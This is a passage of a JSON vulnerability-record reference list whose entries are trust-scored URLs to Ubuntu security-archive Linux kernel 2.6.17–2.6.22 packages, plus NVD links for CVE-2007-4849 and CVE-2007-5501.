        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.42_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc_2.6.17.1-12.42_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.42_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64_2.6.17.1-12.42_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.33_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.42_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-14.47.diff.gz"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-386_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64_2.6.20-16.33_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14_2.6.22-14.47_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-virtual_2.6.22-14.47_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.33_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.42_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc-smp_2.6.20-16.33_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.42_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-powerpc_2.6.22-14.47_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4849"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.42_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-386_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.33_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-14-generic_2.6.22-14.47_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-powerpc-smp_2.6.22-14.47_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64-smp_2.6.20-16.33_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc-smp_2.6.17.1-12.42_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc_2.6.17.1-12.42_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-14-powerpc64-smp_2.6.22-14.47_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server-bigiron_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.33_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-powerpc_2.6.22-14.47_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-386-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.33_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-14-powerpc64-smp-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5501"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-14-386-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-kernel-devel_2.6.20-16.33_all.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.33_i386.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.33_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.33.diff.gz"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.33_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-cell_2.6.22-14.47_powerpc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-14-sparc64-di_2.6.22-14.47_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc-di_2.6.20-16.33_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-14-powerpc-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.42_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-14-generic-di_2.6.22-14.47_amd64.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-sparc64-di_2.6.20-16.33_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-sparc64-di_2.6.17.1-12.42_sparc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-14-cell-di_2.6.22-14.47_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-386-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-14.47_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-generic-di_2.6.17.1-12.42_i386.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.42_powerpc.udeb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-14-server_2.6.22-14.47_amd64.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.42_sparc.deb"
      },
      {
        "trust": 0.2,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-14-generic-di_2.6.22-14.47_i386.udeb"
      },
      {
